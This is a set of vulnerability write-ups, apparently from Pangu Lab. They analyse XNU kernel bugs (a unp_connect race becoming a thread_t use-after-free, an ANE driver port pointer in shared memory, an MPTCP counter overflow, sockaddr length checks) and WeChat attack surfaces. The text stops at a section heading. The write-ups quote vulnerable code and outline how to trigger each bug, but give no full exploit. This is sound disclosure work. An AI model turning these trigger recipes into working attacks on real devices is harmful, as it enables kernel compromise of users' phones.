Don’t play with fire, as well as race condition

This is my first blog in 2021. I wish all of you have a wonderful new year.

Background

At Black hat USA 2019, we introduced a socket Use-After-Free (UAF) vulnerability caused by bad locking in the UNIX socket bind function on iOS. Briefly speaking, the function unp_bind temporarily unlocks the socket while binding the socket to a vnode, leading to a race condition. As a result, we can bind one socket to two vnodes. When the socket is closed and freed, one of the two vnodes still keeps a dangling pointer pointing to the freed socket object. By manipulating the vnodes again, we can trigger the socket UAF in the kernel. For more details, please refer to 1.

bind and connect are two basic interfaces for a socket, and have the same parameters.

int
     connect(int socket, const struct sockaddr *address, socklen_t address_len);`
int
     bind(int socket, const struct sockaddr *address, socklen_t address_len);

If the bind function is buggy, how about the connect function?

Socket Programming 101

A UNIX domain socket can be either connection-oriented (type SOCK_STREAM) or connectionless (type SOCK_DGRAM). In the case of connection-oriented scenario, we can setup a server socket, bind it to a local file address, and then listen and accept new connections. Here, bind() assigns a unique name to an unnamed socket.

According to the local file name, we can connect a client socket to the server socket. If it succeeds, a new socket is inserted into the server socket’s connection queue. The server can then call accept() to extract the first connection request on the queue of pending connections, create a new socket with the same properties of socket, and allocate a new file descriptor for the new socket.

The Vulnerability

A client socket is not supposed to connect to different servers at the same time. However, let’s take a look at the function unp_connect. I copied and pasted the source code of unp_connect as follows.

static int
unp_connect(struct socket *so, struct sockaddr *nam, __unused proc_t p)
{
	...
	socket_unlock(so, 0);  <<--- a. temporary unlock so

	NDINIT(&nd, LOOKUP, OP_LOOKUP, FOLLOW | LOCKLEAF, UIO_SYSSPACE,
	    CAST_USER_ADDR_T(buf), ctx);
	error = namei(&nd); 	<<--- b. lookup the address
	if (error) {
		socket_lock(so, 0);
		return error;
	}
	nameidone(&nd);
	vp = nd.ni_vp;				
	if (vp->v_type != VSOCK) {
		error = ENOTSOCK;
		socket_lock(so, 0);
		goto out;
	}
	...
	socket_lock(vp->v_socket, 1); /* Get a reference on the listening socket */
	so2 = vp->v_socket;
	...
	if (so < so2) {
		socket_unlock(so2, 0);
		socket_lock(so, 0);  <<--- c. relock the sockets
		socket_lock(so2, 0);
	} else if (so > so2) {
		socket_lock(so, 0);
	}
	/*
	 * Check if socket was connected while we were trying to
	 * get the socket locks in order.
	 * XXX - probably shouldn't return an error for SOCK_DGRAM
	 */
	if ((so->so_state & SS_ISCONNECTED) != 0) {
		error = EISCONN;
		goto decref_out;
	}

	...
		socket_unlock(so, 0); <<--- d. temporary unlock so 

		if ((so2->so_options & SO_ACCEPTCONN) == 0 ||
		    (so3 = sonewconn(so2, 0, nam)) == 0) {   <<---  e. make a new connection
			error = ECONNREFUSED;
			if (so != so2) {
				socket_unlock(so2, 1);
				socket_lock(so, 0);
			} else {
				socket_lock(so, 0);
				/* Release the reference held for
				 * listen socket.
				 */
				VERIFY(so2->so_usecount > 0);
				so2->so_usecount--;
			}
			goto out;
		}
		...
			if (so < so2) {
			socket_unlock(so2, 0);
			socket_lock(so, 0); <<--- f. relock
			socket_lock(so2, 0);
		} else {
			socket_lock(so, 0);
		}

		/* Check again if the socket state changed when its lock was released */
		if ((so->so_state & SS_ISCONNECTED) != 0) {
			error = EISCONN;
			socket_unlock(so2, 1);
			socket_lock(so3, 0);
			sofreelastref(so3, 1);  <<-- g. free the new conn
			goto out;
		}
...

	error = unp_connect2(so, so2);
	...
}

Sorry for the long code snippet. At the first glance, you may have noticed that unp_connect performs socket locks and unlocks for multiple times. This is a strong indicator for a race condition. However, if you read the comments in the function, you will find that the developers have realized the potential race conditions. Every time the socket is re-locked, unp_connect performs checks on any change of the socket state. For example, after the lock at (c), we can find the following comments:

	 * Check if socket was connected while we were trying to
	 * get the socket locks in order.
	 * XXX - probably shouldn't return an error for SOCK_DGRAM

Another example: after the lock at (f), we can find the comments:

/* Check again if the socket state changed when its lock was released */

Playing with race condition is dangerous. In the case of unp_connect, the vulnerability occurs after a race condition is detected. Since I don’t want to write a long blog in holiday, let’s go to the vulnerability directly.

		if ((so2->so_options & SO_ACCEPTCONN) == 0 ||
		    (so3 = sonewconn(so2, 0, nam)) == 0) {   <<---  e. make a new connection
		...
		/* Check again if the socket state changed when its lock was released */
		if ((so->so_state & SS_ISCONNECTED) != 0) {
			error = EISCONN;
			socket_unlock(so2, 1);
			socket_lock(so3, 0);
			sofreelastref(so3, 1);  <<-- g. free the new conn

For the code above, so3 is a newly created socket from the server socket through the function sonewconn. unp_connect temporarily unlocks the client socket while performing sonewconn, and relocks the client socket. If the client socket’s state is changed to SS_ISCONNECTED, which implies that the client socket is connected to somewhere else during the temporary unlock, unp_connect just returns EISCONN and frees so3.

Let’s focus on the following two lines:

			socket_lock(so3, 0);
			sofreelastref(so3, 1);

Clearly, so3 is locked through the function socket_lock, and passed into function sofreelastref. Would sofreelastref really and directly free so3? No!

void
sofreelastref(struct socket *so, int dealloc)
{
	struct socket *head = so->so_head;

	/* Assume socket is locked */

	if (!(so->so_flags & SOF_PCBCLEARING) || !(so->so_state & SS_NOFDREF)) {
		selthreadclear(&so->so_snd.sb_sel);
		selthreadclear(&so->so_rcv.sb_sel);
		so->so_rcv.sb_flags &= ~(SB_SEL | SB_UPCALL);
		so->so_snd.sb_flags &= ~(SB_SEL | SB_UPCALL);
		so->so_event = sonullevent;
		return;
	}
	...

If a socket’s so_flags has no SOF_PCBCLEARING or SS_NOFDREF set, sofreelastref does not deallocate the socket. For a newly created socket so3, does it have SOF_PCBCLEARING or SS_NOFDREF set? Still, no!

Now what we have is that, so3 is locked, but not freed. The question is where so3 is? In fact, so3 is inserted into the server socket so_incomp list. Let’s go back to the function sonewconn.

/*
 * When an attempt at a new connection is noted on a socket
 * which accepts connections, sonewconn is called.  If the
 * connection is possible (subject to space constraints, etc.)
 * then we allocate a new structure, propoerly linked into the
 * data structure of the original socket, and return this.
 * Connstatus may be 0, or SO_ISCONFIRMING, or SO_ISCONNECTED.
 */
static struct socket *
sonewconn_internal(struct socket *head, int connstatus)
{
...
  so = soalloc(1, SOCK_DOM(head), head->so_type);
	if (so == NULL) {
		return (struct socket *)0;
	}
...
	/* Insert in head appropriate lists */
	so_acquire_accept_list(head, NULL);

	so->so_head = head;

...
	so->so_flags |= SOF_INCOMP_INPROGRESS;
...
		TAILQ_INSERT_TAIL(&head->so_incomp, so, so_list);
		so->so_state |= SS_INCOMP;
		head->so_incqlen++;
...
	so_release_accept_list(head);
...

It’s clear now: so3 is on the server socket’s so_incomp list. When the server socket is closed, it is responsible to clean up the so_incomp list. The following code shows the function soclose_locked.

int
soclose_locked(struct socket *so)
{
...
		TAILQ_FOREACH_SAFE(sp, &so->so_incomp, so_list, sonext) {
			...
			if (persocklock != 0) {
				socket_lock(sp, 1);
			}
...

Have you pinpointed the issue? As we checked, so3 is locked and inserted into to so_incomp list. However, when the function soclose_locked processes the so_incomp list, it would lock sp again. Actually, sp is our locked so3!

So far it sounds like a lock issue. Yes, the race condition in unp_connect now turns into a double lock issue. A socket object is passed into socket_lock twice. Does it cause any memory safety problem?

The Lock

The implementation of locks on iOS is very complicated, as least to me. The readers could check XNU source code for more details. In our case, socket_lock calls unp_lock, and eventually calls lck_mtx_lock and calls lck_mtx_lock_contended.

unp_lock(struct socket *so, int refcount, void * lr)
{
...
	if (so->so_pcb) {
		lck_mtx_lock(&((struct unpcb *)so->so_pcb)->unp_mtx);
...	

void
lck_mtx_lock(lck_mtx_t *lock)
{
	thread_t        thread;
...
	thread = current_thread();
...
	lck_mtx_lock_contended(lock, thread, FALSE);
}

If a lock is unlocked, lck_mtx_lock_contendedwill directly acquire the lock and set the ownership. The ownership is the current thread pointer. Otherwise, if the lock is locked, lck_mtx_lock_contended would try to loop waiting until the lock is released. During this process, lck_mtx_lock_contended will use the owner thread pointer for many reasons.

How to trigger thread_t UAF

Now we try to turn the double-lock issue into a thread_t UAF. The idea is as follows.

Now we try to turn the double-lock issue into a thread_t UAF. The idea is as follows.

We create two threads that try to connect the same client socket to two different server sockets. If unp_connect catches the race condition, it may create a new so3, insert it to the corresponding server socket’s so_incomp list, and then lock so3 that stores the thread_t pointer of the corresponding thread.

And then, we terminate the two threads, as a result, the two thread_t objects are deallocated in the kernel. However, the so3 still keeps a dangling thread_t pointer in its lock object.

Now we close all the server sockets, which will trigger the cleanup of the so_incomp list of the server sockets. As a result, the kernel will run socket_lock(so3) again. Accessing to the owner thread of so3’s lock will trigger the thread_t UAF problem.

For a complete POC, please check 2.

Conclusion

We shared a thread_t UAF problem in the XNU kernel. We analyzed how a failed race condition turns into a double-lock issue, and then turns into a UAF issue. Hope you enjoy the blog. Thank you for reading.

Don’t place a port in shared memory

Motivation

Today I read a very interesting blogpost by Brandon Azad from Google Project 0 (https://googleprojectzero.blogspot.com/2020/11/oops-i-missed-it-again.html) , which disclosed an incorrect bound-check in the function H11ANEInDirectPathClient::externalMethod, allowing to invoke (more privileged) H11ANEInUserClient’s external methods in the context of (less privileged) H11ANEInDirectPathClient, eventually leading to type confusions or other security issues.

It is very likely a copy-paste bug. Similar to Brandon, I also missed the vulnerability! It’s kind of unacceptable. Following Brandon’s blogpost, we will share another bug in the H11ANEIn driver.

H11ANEIn

The H11ANEIn driver was first introduced in iOS 12 for A12 devices (e.g., iPhone XS and XS Max).  I think that “ANE” stands for “Apple Neural Engine”.

The H11ANEIn driver offers two types of IOUserClients, H11ANEInDirectPathClient and H11ANEInUserClient. In particular, H11ANEInUserClient is more powerful than H11ANEInDirectPathClient, as H11ANEInUserClient has more external methods than H11ANEInDirectPathClient. However, creating H11ANEInUserClient requires a special entitlement, com.apple.ane.iokit-user-access. Only a few executables on iOS have the entitlements, such as aned and mediaserverd.

H11ANEInDirectPathClient

Fortunately, the container sandbox allows to open the H11ANEInDirectPathClient IOUserClient. So third-party apps can open and communicate with H11ANEInDirectPathClient IOUserClients. Looking at the function H11ANEInDirectPathClient::externalMethod, (Ok, please forget the incorrect bound-check here), we can find that H11ANEInDirectPathClient actually has the following interfaces:

  • _ANE_DeviceOpen
  • _ANE_DeviceClose
  • _ANE_ProgramSendRequest

Now let’s take a look at the interface _ANE_ProgramSendRequest. Function _ANE_ProgramSendRequest accepts a structural input with length 16.

In fact, at the very beginning of function _ANE_ProgramSendRequest, it would treat the structural input as two uint64 values, and pass them into IOMemoryDescriptor::withAddressRange();

Clearly, the first value is a userspace address, and the second value is the length of the userspace buffer. After creating the IOMemoryDescriptor_ANE_ProgramSendRequest continues to call the prepare and map functions, and map the memory into the kernel space. In other words, _ANE_ProgramSendRequest creates a shared memory now.

More importantly, the _ANE_ProgramSendRequest interface should be called through the IOConnectCallAsyncMethod function. IOConnectCallAsyncMethod allows the IOKit extension to asynchronously process requests from the users-pace. By supplying a notification/wakeup port, a user-space program will receive a notification message when the request is done.  It implies that the kernel or the extension should store the wakeup port somewhere so that the kernel or the extension can send the notification later.

The vulnerability and exploit

The vulnerability is that, _ANE_ProgramSendRequest records the notification context, including the port pointer, in the shared memory!

As we can see above, before invoking H11ANEIn::ANE_ProgramSendRequest, the wakeup port is stored at the shared memory at offset 2616 (note that the offsets vary across iOS kernel versions ).

It’s quite straightforward to convert the vulnerability into an info leak.  We can easily get a port pointer in the shared memory after we trigger the execution of H11ANEInDirectPathClient::_ANE_ProgramSendRequest.

Beyond the info leak, you may have already realized that there are a lot of chances to further exploit the vulnerability, especially for the readers who can still remember the vulnerability exploited by the very first Pangu jailbreak tool (for iOS 7.4.1).

Just a quick recap. At that time, IOSharedDataQueue stores a mach message header in shared memory. We achieve the kernel exploit by crafting the mach message header (https://googleprojectzero.blogspot.com/2018/10/deja-xnu.html).

Similar here, we can modify the port pointer in the shared memory so that when a notification is to be sent to a fake (arbitrary) port. This blog won’t go to details of the exploit. There are so many different ways to accomplish a kernel exploit when you have a full control to a port pointer.

Things I haven’t mentioned

It wouldn’t be that easy to reproduce the vulnerability, because you will find that H11ANEIn::ANE_ProgramSendRequest will not deliver a notification to the user-space app unless you have a properly-filled request.

First, H11ANEInDirectPathClient::ANE_DeviceOpen needs to be executed before H11ANEIn::ANE_ProgramSendRequest. Second, H11ANEIn::ANE_ProgramSendRequest will eventually go to the function H11ANEIn::ANE_ProgramSendRequest_gated.

Both  H11ANEInDirectPathClient::ANE_DeviceOpen and H11ANEIn::ANE_ProgramSendRequest_gated have a common operation: looking up a program buffer according to a program handle id. This program handle id comes from the user input. Without a correct program handle id, H11ANEIn::ANE_ProgramSendRequest would simply return. No notification would be sent.

So what is the program buffer and the program handle id? Remember that there is another more privileged IOUserClient, H11ANEInUserClient. H11ANEInUserClient has the interfaces to create and destroy ane programs and get the program handle ids:

  • H11ANEInUserClient::_ANE_ProgramCreate
  • H11ANEInUserClient:: _ANE_ProgramCreateInstance
  • H11ANEInUserClient::_ANE_ProgramDestroy

However, container apps cannot create H11ANEInUserClient, what can we do?

I had to spend some time on machine learning.  It’s true. I learned how to use the Core ML framework (https://developer.apple.com/documentation/coreml), and how to integrate machine learning models into my app. I tried all the models on the page https://developer.apple.com/machine-learning/models/ .

Finally, I figured out that our app can talk to aned, and then ask aned to create a H11ANEInUserClient and create an ane program. After aned returns a program handle id to my app, we can continue to develop our exploit. So, if you want to reproduce the vulnerability, learn machine learning first!

Thank you for your time.

MPTCP Integer Overflow Vulnerability

In this blog, we will share an integer overflow vulnerability in the MPTCP module in the XNU kernel. 

When we started to study MPTCP, we got a very brief description from the official document:

“MPTCP is a set of extensions to the Transmission Control Protocol (TCP) specification. With MPTCP, a client can connect to the same destination host with multiple connections over different network adapters”.

Now a natural question comes into our mind: how many connections can a client connect to a host at most?  With this question in mind, we created a simple test program that simply creates an MPTCP socket and connects to a host many times. Our purpose is to figure out when we cannot create new connections. 

The test program ran fine. However, the surprise thing was that we triggered a kernel panic when the test program exited. 

The test program was so simple that we had no clue about what triggered the panic. After analyzing the panic log, we realized that our program triggered a recursive kernel function and resulted in a kernel stack exhaustion when the MPTCP socket was closed.  Note that the recursive function panic was also already fixed. You won’t be able to trigger it on iOS 13.

We continued our testing process. Now, we turned to the XNU source code. We quickly found the following data structure. 

struct mptses {
	struct mppcb    *mpte_mppcb;            /* back ptr to multipath PCB */
	struct mptcb    *mpte_mptcb;            /* ptr to MPTCP PCB */
	TAILQ_HEAD(, mptopt) mpte_sopts;        /* list of socket options */
	TAILQ_HEAD(, mptsub) mpte_subflows;     /* list of subflows */
	uint16_t        mpte_numflows;          /* # of subflows in list */
	uint16_t        mpte_nummpcapflows;     /* # of MP_CAP subflows */
	sae_associd_t   mpte_associd;           /* MPTCP association ID */
	sae_connid_t    mpte_connid_last;       /* last used connection ID */
...

mptses represents MPTCP sessions. Every time a new connection is created between a client and a host, there will be a new mpte_subflow created. mptses->mpte_numflows records the number of subflows.  

static void
mptcp_subflow_attach(struct mptses *mpte, struct mptsub *mpts, struct socket *so)
{
	struct socket *mp_so = mpte->mpte_mppcb->mpp_socket;
	struct tcpcb *tp = sototcpcb(so);

...
	/*
	 * Insert the subflow into the list, and associate the MPTCP PCB
	 * as well as the the subflow socket.  From this point on, removing
	 * the subflow needs to be done via mptcp_subflow_del().
	 */
	TAILQ_INSERT_TAIL(&mpte->mpte_subflows, mpts, mpts_entry);
	mpte->mpte_numflows++; //<====== no integer overflow checks

As we can see in function mptcp_subflow_attach, creating a new connection will increase mpte->mpte_numflows by one, but there is no integer overflow checks at all.

You may also notice that, mpte_numflows is in the type of uint16_t, which means its maximum value is 0xFFFF!  So what if we create 0xFFFF+2 connections? The answer is that mpte_numflows will wrap to 1!

So far, the integer overflow doesn’t cause any memory errors. We continued to check how mpte_numflows would be used. Just by greping  mpte_numflows, we got the following sysctl handler: mptcp_pcblist

static int
mptcp_pcblist SYSCTL_HANDLER_ARGS
{
...
	TAILQ_FOREACH(mpp, &mtcbinfo.mppi_pcbs, mpp_entry) {
		flows = NULL;
		socket_lock(mpp->mpp_socket, 1);
		VERIFY(mpp->mpp_flags & MPP_ATTACHED);
		mpte = mptompte(mpp);

...
		mptcpci.mptcpci_nflows = mpte->mpte_numflows;
...
		len = sizeof(*flows) * mpte->mpte_numflows;
		if (mpte->mpte_numflows != 0) {
			flows = _MALLOC(len, M_TEMP, M_WAITOK | M_ZERO);  
//<=== alloc memory according to mpte->mpte_numflows
...
		f = 0;
		TAILQ_FOREACH(mpts, &mpte->mpte_subflows, mpts_entry) {
			so = mpts->mpts_socket;
			fill_mptcp_subflow(so, &flows[f], mpts);
 <== dump the list into flows buffer. HEAP OVERFLOW!
			f++;
		

In function mptcp_pcblist, mpte_numflows is used to calculate the length of a temp buffer. If we already make  mpte_numflows wrapped to 1, the allocation site will only allocate ONE entry. However,  mptcp_pcblist will traverse the list mpte_subflows and dump all the entries into the allocated buffer. Heap overflow happens! 

We won’t get into the exploitation phase. With partially controlled values and partially controlled length, the exploitation would be also very interesting. 

Fixing the issue is quite easy. The patch is as follows. mptcp_subflow_add function now adds a limitation to mpte_numflows.

Do you still remember the question at the beginning? How many connections does an MPTCP socket allow? Now, we got the answer:

#define MPTCP_MAX_NUM_SUBFLOWS 256

Credit: The integer overflow was discovered and analyzed by Tao Huang and Tielei Wang of Pangu Lab.

Thanks for reading!

sockaddr->sa_len的痛

0x00 引言

sockaddr是xnu内核中一个很普通的数据结构,用于描述socket地址的基本属性,包括地址长度及其所属family类型。结构体具体定义如下:

struct sockaddr {
	__uint8_t       sa_len;         /* total length */   
	sa_family_t     sa_family;      /* [XSI] address family */
	char            sa_data[14];    /* [XSI] addr value (actually larger) */
};

由于xnu支持多种socket类型,不同类型的socket使用的sockaddr长度可能不同,xnu中为每种sockaddr都有具体定义。例如,下面分别是sockaddr_insockaddr_in6sockaddr_unsockaddr_ctl 的结构。

struct sockaddr_in {
	__uint8_t       sin_len;
	sa_family_t     sin_family;
	in_port_t       sin_port;
	struct  in_addr sin_addr;
	char            sin_zero[8];
};
struct sockaddr_in6 {
	__uint8_t       sin6_len;       /* length of this struct(sa_family_t) */
	sa_family_t     sin6_family;    /* AF_INET6 (sa_family_t) */
	in_port_t       sin6_port;      /* Transport layer port # (in_port_t) */
	__uint32_t      sin6_flowinfo;  /* IP6 flow information */
	struct in6_addr sin6_addr;      /* IP6 address */
	__uint32_t      sin6_scope_id;  /* scope zone index */
};
struct  sockaddr_un {
	unsigned char   sun_len;        /* sockaddr len including null */
	sa_family_t     sun_family;     /* [XSI] AF_UNIX */
	char            sun_path[104];  /* [XSI] path name (gag) */
};
struct sockaddr_ctl {
	u_char      sc_len;     /* depends on size of bundle ID string */
	u_char      sc_family;  /* AF_SYSTEM */
	u_int16_t   ss_sysaddr; /* AF_SYS_KERNCONTROL */
	u_int32_t   sc_id;      /* Controller unique identifier  */
	u_int32_t   sc_unit;    /* Developer private unit number */
	u_int32_t   sc_reserved[5];
};

每种sockaddr_* 的头部结构都是sockaddr,其中第一个字节即sa_len表示该结构的长度,第二个字节sa_family表示地址类型。内核使用struct sockaddr*指针类型时,需要根据sa_family将其转换成struct sockaddr_in6*struct sockaddr_in*等具体类型。可以看到,当内核处理由用户态提交的sockaddr数据时,如果对sa_family或者sa_len检查不严格时,就可能导致安全漏洞。尤其是sa_len,描述了数据长度,如果检查不当,就可能引起内存越界访问等问题。

0x01 漏洞介绍

近些年xnu中陆续披露了一些与sockaddr相关的安全漏洞,其中最为著名的,是Google Project 0团队Ian Beer在mptcp模块中发现的一个漏洞。这里,我们先详细介绍一下这个漏洞。理解这个漏洞的成因对挖掘新漏洞很有帮助。

漏洞回顾

Ian Beer发现的mptcp漏洞位于mptcp_usr_connectx函数中。mptcp_usr_connectx在处理用户态传入的sockaddr数据时,认为其类型只可能是AF_INET或者AF_INET6mptcp_usr_connectx严格检查了sockaddr是这两种类型时的sa_len字段。然而,这里的逻辑缺陷是,一旦传入不是AF_INET或者AF_INET6类型的sockaddrsa_len字段就没有检查。mptcp_usr_connectx使用sa_len字段调用memcpy时发生堆溢出。更详细的漏洞分析见链接:Issue 1558: XNU kernel heap overflow due to bad bounds checking in MPTCP

// verify sa_len for AF_INET:

  if (dst->sa_family == AF_INET &&
      dst->sa_len != sizeof(mpte->__mpte_dst_v4)) {
    mptcplog((LOG_ERR, "%s IPv4 dst len %u\n", __func__,
        dst->sa_len),
       MPTCP_SOCKET_DBG, MPTCP_LOGLVL_ERR);
    error = EINVAL;
    goto out;
  }

// verify sa_len for AF_INET6:

  if (dst->sa_family == AF_INET6 &&
      dst->sa_len != sizeof(mpte->__mpte_dst_v6)) {
    mptcplog((LOG_ERR, "%s IPv6 dst len %u\n", __func__,
        dst->sa_len),
       MPTCP_SOCKET_DBG, MPTCP_LOGLVL_ERR);
    error = EINVAL;
    goto out;
  }

// code doesn't bail if sa_family was neither AF_INET nor AF_INET6

  if (!(mpte->mpte_flags & MPTE_SVCTYPE_CHECKED)) {
    if (mptcp_entitlement_check(mp_so) < 0) {
      error = EPERM;
      goto out;
    }

    mpte->mpte_flags |= MPTE_SVCTYPE_CHECKED;
  }

// memcpy with sa_len up to 255:

  if ((mp_so->so_state & (SS_ISCONNECTED|SS_ISCONNECTING)) == 0) {
    memcpy(&mpte->mpte_dst, dst, dst->sa_len); <== 当sa_family为非AF_INET和AF_INET6时,没有对sa_len进行长度校验,所以sa_len可以最大为0xff,导致堆溢出。
  }

Ian Beer对这个漏洞的利用技巧也非常精彩。我们暂不关心漏洞的利用过程,再分析一下这个漏洞特征。可以看到在这个漏洞代码里,开发者虽然有意识的检查了sockaddr数据,但只检查了特定类型和相应长度的匹配关系;这导致如果传入的sockaddr数据是别的类型,其sa_len字段并没有有效检查。

漏洞1 ==>inctl_ifdstaddr

看过Ian Beer这个漏洞后,我们开始思考,xnu中是否还存在类似的问题:对传入的sockaddr仅做了部分类型和长度匹配检查,对其它类型的sockaddr未作检查而继续使用?

带着这个问题,我们继续审计xnu代码。很快我们就在ioctl的处理函数(in_control函数)里发现了一个新的信息泄漏漏洞。

该漏洞原因是inctl_ifdstaddr函数在处理SIOCSIFDSTADDR命令时,只处理了family为AF_INET时的sin_len,因此当family为其他值(比如AF_INET6)的时候,sin_len未被检查,可以为任意值。

如下所示,ifr指向用户可控的数据,当inctl_ifdstaddr函数在处理SIOCSIFDSTADDR命令时,先将用户可控的结构体ifr全部拷贝到ia里,然后在a处,处理family为AF_INET的情况:将ia->ia_dstaddr.sin_len设置为sockaddr_in的结构体大小。

但是,当family为其他值,比如为AF_INET6时,inctl_ifdstaddr函数没有做任何处理,所以ia->ia_dstaddr.sin_len就仍是从ifr里面拷贝过来的用户控制的length,范围为0~0xff。

static __attribute__((noinline)) int
inctl_ifdstaddr(struct ifnet *ifp, struct in_ifaddr *ia, u_long cmd,
    struct ifreq *ifr){
  //...
	case SIOCSIFDSTADDR:            /* struct ifreq */
		VERIFY(ia != NULL);
		IFA_LOCK(&ia->ia_ifa);
		dstaddr = ia->ia_dstaddr;
		bcopy(&ifr->ifr_dstaddr, &ia->ia_dstaddr, sizeof(dstaddr));
		if (ia->ia_dstaddr.sin_family == AF_INET) {
			ia->ia_dstaddr.sin_len = sizeof(struct sockaddr_in); <== a:只在family为AF_INET时检查sin_len 
		}
		//...
}

到这里,我们可以在ia->ia_dstaddr填入一个非AF_INET类型的sockaddr并任意设定sin_len。接下来的问题是,这个ia->ia_dstaddr在哪里会被使用?

我们继续审计代码,在sysctl_iflist函数中找到了对ia->ia_dstaddr的使用。下面代码中,ifa->ifa_dstaddr就是inctl_ifdstaddr里设置的ia->ia_dstaddr。在b处这个sockaddr被存入到rti_info里,然后传入到rt_msg2函数中。

static int
sysctl_iflist(int af, struct walkarg *w)
{
  while ((ifa = ifa->ifa_link.tqe_next) != NULL) {
        //...
        info.rti_info[RTAX_IFA] = ifa->ifa_addr;
	info.rti_info[RTAX_NETMASK] = ifa->ifa_netmask;
	info.rti_info[RTAX_BRD] = ifa->ifa_dstaddr; <== b: 之前设置的sockaddr
//...
	len = rt_msg2(RTM_NEWADDR, &info, <== c:  
		caddr_t)cp, NULL, &cred);
          //...
    }

我们来看rt_msg2的实现。rt_msg2就循环遍历rtinfo数组,当遍历到RTAX_BRD时,sa就是ifa->ifa_dstaddr。那么如e处所示,dlen就是之前用户可控的length,最大可达到0xff。rt_msg2调用bcopy函数做内存复制时,发生内存越界读,最大可拷贝出255字节的数据,这些泄漏出来的数据里可能包含函数指针,导致内存泄漏。

static int
rt_msg2(int type, struct rt_addrinfo *rtinfo, caddr_t cp, struct walkarg *w,
    kauth_cred_t* credp){
  for (i = 0; i < RTAX_MAX; i++) {
    //...
  	if ((sa = rtinfo->rti_info[i]) == NULL) { <== d:当i遍历到RTAX_BRD时,sa就是ifa->ifa_dstaddr
			continue;
		}
    //...
    rtinfo->rti_addrs |= (1 << i);
		dlen = sa->sa_len; 	<== e: 当i遍历到RTAX_BRD时, dlen为用户可控。
		rlen = ROUNDUP32(dlen);
		if (cp) {
			bcopy((caddr_t)sa, cp, (size_t)dlen); <== f: cp最后会被拷贝到用户态
			if (dlen != rlen) {
				bzero(cp + dlen, rlen - dlen);
			}
			cp += rlen;
		}
		len += rlen;
  }
  //...
}

我们POC运行结果如下。越界读取函数指针后,即可计算kernel slide。

漏洞2 ==>flow_divert_is_sockaddr_valid

上面的信息泄漏不是孤例。很明显,开发者犯了mptcp里同样的错误。我们再把漏洞特征放宽一些,看看其它xnu模块中对sa_len字段的检查。

很快,在flow_divert_is_sockaddr_valid函数中,我们看到了下面的代码。

static boolean_t,
flow_divert_is_sockaddr_valid(struct sockaddr *addr)
{
	switch (addr->sa_family) {
	case AF_INET:
		if (addr->sa_len < sizeof(struct sockaddr_in)) { <==应该是!=
			return FALSE;
		}
		break;
#if INET6
	case AF_INET6:
		if (addr->sa_len < sizeof(struct sockaddr_in6)) {<==应该是!=
			return FALSE;
		}
		break;
#endif  /* INET6 */
	default:
		return FALSE;
	}
	return TRUE;
}

通过函数名字,不难推测flow_divert_is_sockaddr_valid就是用来验证sockaddr是否合法的。flow_divert_is_sockaddr_valid明确限定了sockaddr只能是AF_INET或者AF_INET6。然而,在长度检查中,flow_divert_is_sockaddr_valid犯了一个低级错误: flow_divert_is_sockaddr_valid函数只检查了addr->sa_len不要小于结构体的实际大小,但是却没考虑到sa_len可能大于结构体实际大小的情况。

因此,只要传入的sockaddr类型是AF_INET或者AF_INET6,攻击者就可以设置过长的sa_len,导致flow_divert后继使用sockaddr的时候发生内存越界访问。感兴趣的朋友可以尝试一下自行构造POC代码。

0x02 修复

针对第一个泄漏,Apple在最新的iOS 13.6版本中已经修复。在已经开源的xnu-6153.141.1中,我们可以对比发现补丁信息如下。

在上面的代码中,inctl_ifdstaddr函数在处理SIOCSIFDSTADDR命令时,强制把ia->ia_dstaddrfamilysin_len字段设置为AF_INET类型。

针对第二个漏洞,Apple在iOS 13.5中已经修复。Apple并没有直接更改函数flow_divert_is_sockaddr_valid, 而是在调用这个函数外层,增加了长度检查。

0x03 总结

这篇文章里,我们分享了我们如何在Ian Beer公布mptcp漏洞后,分析漏洞成因、总结漏洞特征、到根据漏洞特征挖掘新漏洞的过程。漏洞挖掘很考验研究者“举一反三”的能力。在大量代码中针对性的快速定位疑似漏洞代码会大大提高漏洞挖掘的效率。而从历史漏洞中总结分析,对定位疑似漏洞代码大有毗益。此外,
sockaddr一个如此简单的数据结构,但在大量的类型转换过程中,一旦类型和长度检查逻辑不完备,就可能导致更严重的安全问题。在我们分享的这两个漏洞之外,我相信也能找到其它相似问题。

Credit:漏洞由盘古实验室迟欣茹、王铁磊发现,提交Apple修复。

微信远程攻击面简单的研究与分析

在完成了对 FaceTime 的一系列漏洞挖掘与研究后,我们决定对微信的音视频通信做一些分析。经分析后发现,当微信语音通话连接建立成功之后,微信客户端将解析远端发来的网络报文并还原成多媒体流。在还原解析的过程中,如果处理远端数据的代码存在问题时就会形成一个远程的攻击面。

在针对这个攻击面进行深入挖掘后我们发现了若干可以造成远程内存破坏的漏洞。本篇文章我们将选择一个比较有趣且复杂的漏洞进行深入的分析。该漏洞可以造成远程写溢出从而导致崩溃,其root cause隐藏的非常深,触发流程也比较复杂。研究与分析该漏洞无论是对安全研究还是软件开发的角都有一定的价值。我们将在文章中详细的分析漏洞成因和触发流程。微信已经在最新版7.0.12中修复了该漏洞。

开胃小菜

首先我们先介绍两个比较简单的漏洞,一个属于本地代码执行,一个属于远程溢出。

本地代码执行

Mac版本的微信客户端处理粘贴操作时,没有有效检查粘贴板对象中内容,导致不安全的对象反序列化。当本地其他恶意应用设置粘贴板时,用户在微信客户端粘贴操作时,会导致任意对象的创建。

如下面截图所示,Mac 版本的微信在反序列化粘贴板对象的过程中,并没有使用secure coding 以及白名单等设置,导致任何可以响应 [initwithcoder:] 函数的 objective-c 对象都能被创建并使用,会引起很大的攻击面。

Mac版本微信对剪切板的处理

具体攻击结果可以参考[Google Project Zero在iMessage中发现的大量不安全反序列化攻击] (https://www.blackhat.com/us-19/briefings/schedule/#look-no-hands—-the-remote-interaction-less-attack-surface-of-the-iphone-15203).

Mac版本微信已经对该漏洞进行了完全正确的修复,调用了 setRequiresSecureCoding: 函数,并作出了安全设置。

修复后的剪切板处理

远程下溢出

微信视频通话接通后,通话两端建立网络直连传递RTP报文。微信客户端传输RTP包过程中,采用了一套加密机制。但是微信客户端在RTP解密之前,没有很好验证RTP包长度。当攻击者发送很短的RTP包的时候,会引起接受端处理RTP包过程中长度计算的整数下溢出,进而导致内存越界访问。

RTP包长度验证减法下溢出

有趣的是,GP0 研究员在微信 CAudioJBM::InputAudioFrameToJBM 函数中发现了类似的错误 (https://bugs.chromium.org/p/project-zero/issues/detail?id=1948)。这说明微信在在包长度验证时存在一定共性缺陷。

这是一个非常明显的下溢出,但是通过对这个问题的分析,我们认为远程的攻击面中可能存在风险更高的漏洞。

远程写溢出成因与分析

